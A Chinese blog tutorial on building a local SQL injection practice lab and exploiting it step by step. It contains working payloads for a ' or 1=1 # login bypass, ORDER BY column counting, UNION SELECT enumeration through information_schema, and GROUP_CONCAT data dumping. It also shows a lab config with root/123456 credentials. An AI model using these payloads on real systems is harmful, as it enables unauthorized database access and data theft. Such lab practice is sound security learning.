SQL注入——从零开始搭建靶场详细教程_实战练习_注入原理

最新推荐文章于 2024-08-11 08:00:00 发布
最新推荐文章于 2024-08-11 08:00:00 发布
阅读量1.4w 收藏 120
点赞数 13
分类专栏: # 安全技术实践 文章标签: 数据库 sql 安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/107746277
版权

文章目录

一、环境依赖

  1. VMware V15.5(可选)
  2. Windows 10 x64 虚拟机(可选)
  3. phpstudy V8.1
  4. MySQL V5.7.26(在phpstudy内选择)
  5. Nginx 1.15.11(在phpstudy内选择)
  6. PHP V5.6.9(在phpstudy内选择)
  7. SQLyog(可用phpstudy内其他软件代替)
  8. 成绩管理系统靶场

二、靶场搭建

安装以上环境和软件

为模拟真实情况,靶场搭建在虚拟机内,而访问在物理机上完成(可选)
当然,操作均在物理机上进行也没问题

以下操作均在虚拟机内完成

Ⅰ、下载靶场文件

–>靶场文件传送门<–
提取码:244q

Ⅱ、创建网站

phpstudy --> 网站 --> 创建网站 --> 填写域名、端口、根目录,更改PHP版本
物理路径选择解压的靶场路径(需修改成全英文)
请确认版本信息
在这里插入图片描述

Ⅲ、更改数据库root密码

数据库 --> 修改root密码 --> 将root密码修改为123456(与靶场数据库保持一致)
靶场数据库密码在query.php可以查询

<?php
  require_once('query.html');
  $db=mysql_connect('127.0.0.1','root','123456');
 ...

在这里插入图片描述

Ⅳ、新建并导入数据库

打开SQLyog --> 新建 --> 填写主机地址为localhost、密码为123456
在这里插入图片描述
左侧栏 --> 右键创建数据库
名称自拟,建议设置成grade

–> 单击选中新建数据库 --> 将靶场文件夹内的.sql文件拖入SQLyog -->左上角执行全部

在这里插入图片描述
导入成功后右下会有提示

成功后即可关闭SQLyog

Ⅴ、验证访问靶场

浏览器输入localhost:端口号访问靶场
在这里插入图片描述

三、实战练习

以下操作在物理机上进行

访问靶场前使用CMD得到虚拟机IP

Ⅰ、嗅探字段

①、验证合法性

输入' #、任意英文字符串、任意数字串验证合法性
查询结果无报错则语句合法

use mysqli报错是由于使用了过时的PHP连接数据库函数,在此处不影响注入操作
在这里插入图片描述

※语句解释

查询学号基于SQL语法:

SELECT 学号 FROM 数据表 WHERE 名字 = ’ {输入的名字} ’

因此构造了以下语句

SELECT 学号 FROM 数据表 WHERE 名字 = ’ ’ # ’
查找空名字对应的学号,#号将后接入的’注释了

②、查找注入点

输入' or 1=1 #构造语句

SELECT 学号 FROM 数据表 WHERE 名字 = ’ ’ or 1=1 # ’
or使得查询条件变为True,即全查询
在这里插入图片描述

出现所有结果表明学号存在注入点
尝试使用万能账户' or 1=1 #登录,成功
(密码任填)
在这里插入图片描述
接下来查找字段名
使用F12 --> Network 查看发包方式
在这里插入图片描述
从而知道用户名字段名称为user

③、嗅探字段数

输入' ORDER BY -1 #查看是否有字段存在

SELECT 学号 FROM 数据表 WHERE 名字 = ’ ’ ORDER BY -1 # ’
按照第-1列排序(第一列为1),若无报错证明至少存在一列

有字段存在后,从1开始递增反复查询直到报错
报错列-1即是字段总数

Ⅱ、嗅探数据库信息

使用联合查询UNION SELECT XXX得到所需信息

  1. 输入'UNION SELECT USER() #查询用户名
  2. 输入'UNION SELECT VERSION() #查询数据库版本
  3. 输入'UNION SELECT DATABASE() #查询当前数据库名

Ⅲ、嗅探数据表信息

①、查询所有表

基础数据库有以下几个库information_schemamysqlperformance_shcemasys
它们记录了整个数据库的基本信息

输入' UNION SELECT table_name FROM information_schema.TABLES WHERE TABLE_SCHEMA = DATABASE() #查询所有数据表信息

SELECT 学号 FROM 数据表 WHERE 名字 = ’ ‘ UNION SELECT table_name FROM information_schema.TABLES WHERE TABLE_SCHEMA = DATABASE() # ’

第一个查询无返回值,第二个查询是在information_schema这个数据库的TABLES表内进行
得到当前数据库包含的所有表的名称
(TABLES表内有所有表的信息)

②、查询指定表的所有列

输入' UNION SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME = "表名"#查询表的所有列名

SELECT 学号 FROM 数据表 WHERE 名字 = ’ ’ UNION SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME = “表名”# ’

第一个查询无返回值,第二个查询是在information_schema这个数据库的COLUMNS表内进行
得到指定数据表包含的所有列的名称
若有重复表,请同时指定数据库名和表名

Ⅳ、爆数据

前提是拿到表结构、字段信息

输入' UNION SELECT GROUP_CONCAT(列1,列2,...,列n) FROM 表名 #
得到指定表指定列的数据

其中,GROUP_CONCAT表示相同行组合便于查看
SELECT 列1,...,列n也可

欢迎在评论区留言
感谢浏览

Ho1aAs
关注
专栏目录
DVWA靶场环境搭建_SQL注入模拟靶机
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-08 2万+
今天讲DVWA的两个重要方面:DVWA靶场环境搭建以及SQL注入模拟靶机。DVWA介绍:在近些年网络安全的高速发展中,初学者已经很难找到一个网站进行渗透了,曾几何时,一个漏洞,一个工具就可以在网上找到很多有漏洞的网站去体验,当然渗透一个未经授权的系统是非法的。因此,为了能够较为真实地学习Web渗透的各种技术,就需要找一个专门用于学习的Web演练平台,人们将这种用于练习渗透的平台称为“靶场”。DVWA可以进行SQL注入、XSS、CSRF、文件上传等漏洞的演练,由于该系统提供了多个安全演练级别,因此可以逐步地来
Sqli-labs靶场搭建(适合新手小白围观)
记录开发和安全学习过程中的点点滴滴
09-12 8835
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs漏洞靶场~SQL注入(全网最全详解)
最新发布
weixin_67832625的博客
08-11 1425
本文主要对sqli-labs靶场的过程及思路做了最清晰的讲解,因为网上都是一些零散教程,今天笔者主打真实,写一篇通俗易懂的文章供大家参考!!!
SQL注入靶场搭建
Aquarius_ego的博客
04-01 6191
1.windows下搭建——利用sqli-labs 2.linux下用docker搭建 docker search sqli-labs docker pull docker.io/acgpiano/sqli-labs 拉取sqli镜像 docker run -dt --name sqli-labs -p 8088:80 --rm docer.io/acgpiano/sqli-labs 运行容器,加载镜像 生成一个容器 docker ps -s 查看容器 ifconfig查看ip
Web安全 SQL注入靶场搭建(玩转整个注入环境.)
网络安全领域___专研者.
05-25 5829
SQLI-LABS靶场概括: SQL语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。而Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程.
SQL注入的分类及靶场搭建
weixin_73180072的博客
12-02 279
SQL靶场安装 SQL注入
sql注入--Pikachu靶场环境搭建
技术骨干小李的博客
07-28 497
pikachu靶场环境搭建
SQL 注入之 Windows/Docker 环境 SQLi-labs 靶场搭建
朱雀随云记的博客
04-07 1908
4、打开浏览器,输入“http://windows服务器ip/sqli-labs-master/” ,可以看到如下的界面,点击“Setup/reset Database for labs”,会出现Access denied的提示。3、执行:docker run -dt --name sqli-labs -p 81:80 --rm acgpiano/sqli-labs, 将镜像运行为容器。--name sqli-labs 将容器命名为sqli-labs。acgpiano/sqli-labs 镜像名。
安全攻防——搭建sql注入靶场
future_1024的博客
01-15 1810
安全攻防——搭建sql注入靶场sql注入简介sql注入的类型与注入技术学习环境搭建(需要安装docker) sql注入简介 最近一段时间负责公司产品安全相关工作,便了解一些相关技术,sql注入就是其中著名又重要的一项。 在了解sql注入之前,以为sql注入只是简单的利用 1=1 这样类似的sql拼接来登录网站,当开始接触后才发现原来sql注入的种类有这么多。 sql注入的类型与注入技术 根据数据类型可以分为以下几种: 数字型注入 字符型注入 包括但不限于以下sql注入技术: Error based D
sql注入靶场实操
m0_46104808的博客
10-27 1588
sql注入漏洞利用
基于大模型的Text2SQL微调的实战教程(二)
热门推荐
herosunly的博客
04-23 10万+
本文主要介绍了基于大模型的Text2SQL微调的实战教程(二),希望对学习大语言模型的同学们有所帮助。 文章目录 1. 前言 2. 配置环境 2.1 安装虚拟环境 2.2 安装依赖库 2.3 下载模型文件 3. 运行代码 3.1 数据预处理 3.2 修改配置文件 3.3 微调
靶场环境搭建-SQL注入平台
weixin_47193338的博客
02-11 1230
一、SQL注入平台介绍 Sqli-labs是一款学习SQL注入的开源平台,共有75种不同的注入类型。 二、安装步骤 1、下载链接:GitHub - Rinkish/Sqli_Edited_Version: Edited SQLi Audi lab series so that it can work in kali linux with PhpVersion 7+解压,放在www目录下 2、打开phpMyAdmin 3、登陆 4、点击数据库,新建数据库security 5、..
[20][03][50] 搭建SQL注入靶场
安全新司机
08-26 191
文章目录1. sqli-labs 是什么2. 搭建靶场3. 访问服务 1. sqli-labs 是什么 sqli-labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含了以下注入 基于错误的注入(Union Select)字符串整数 基于误差的注入(双查询注入) 盲注入 基于Boolian数据类型注入 基于时间注入 更新查询注入(update ) 插入查询注入(insert ) Header头部注入 基于Referer注入 基于UserAgent注入 基于cookie注
关于SQL注入靶场搭建及过关教程
weixin_48042647的博客
03-07 2009
关于SQL注入靶场搭建及过关教程 1.需要环境: 下载安装VMware,在虚拟机上布置虚拟机win7或winXP(个人推荐win7,使用界面与现在的win10界面较为相似,使用起来比较舒适) Win7镜像下载地址:https://msdn.itellyou.cn/ 2.需要工具: PHPstudy,下载地址:https://www.xp.cn/download.html SQL靶场,下载地址: https://pan.baidu.com/s/1yrIJmkREIuaiB7E1Z3ROpA 提取码: 772u
sql注入靶场环境搭建
m0_47555956的博客
10-08 1507
sql注入靶场环境搭建
SQL注入--靶场练习
wmr123456001的博客
02-11 2082
SQL注入靶场练习
SQL注入靶场搭建Sqli-labs)
Bluetuan的博客
01-10 583
如果PHP版本符合5.x则可以跳过这几步不看。
Sql注入靶场环境搭建
zhoutong2323的博客
03-30 569
例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。
sql注入是什么?详细说一下sql注入原理和修复方法
05-04
SQL注入是一种常见的Web应用程序漏洞攻击技术,攻击者通过非法的输入方式将恶意的SQL代码注入到Web应用程序的输入框中,从而达到获取或修改数据库数据的目的。 SQL注入原理是通过输入恶意的SQL代码,使得Web应用程序在处理SQL语句时出现漏洞。攻击者可以通过在输入框中输入一些SQL代码,例如以下代码: ``` ' or 1=1 -- ``` 这段代码会被解析成以下SQL语句: ``` SELECT * FROM users WHERE username = '' or 1=1 --' AND password = '' ``` 其中的`or 1=1`会使得这个SQL语句的条件永远成立,导致查询结果会返回所有的用户数据,而`--`则是注释掉后面的代码,使得输入框后面的代码不会被执行。攻击者可以通过这种方式获取或修改数据库中的数据。 修复SQL注入漏洞的方法主要有以下几种: 1. 输入验证和过滤:对用户输入的数据进行验证和过滤,确保输入的数据符合预期的格式和类型,过滤掉恶意的SQL代码。 2. 使用预编译语句:使用预编译语句可以让数据库在执行SQL语句之前对输入的数据进行参数化处理,避免恶意的SQL代码注入。 3. 最小化权限:给数据库用户分配最小化的权限,避免攻击者通过SQL注入攻击获取敏感的数据库信息。 4. 加密敏感数据:加密敏感数据可以在数据库被盗取的情况下保护数据安全。 5. 使用安全的编程语言和框架:使用安全的编程语言和框架可以避免一些常见的安全漏洞,例如SQL注入、跨站脚本攻击等。
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值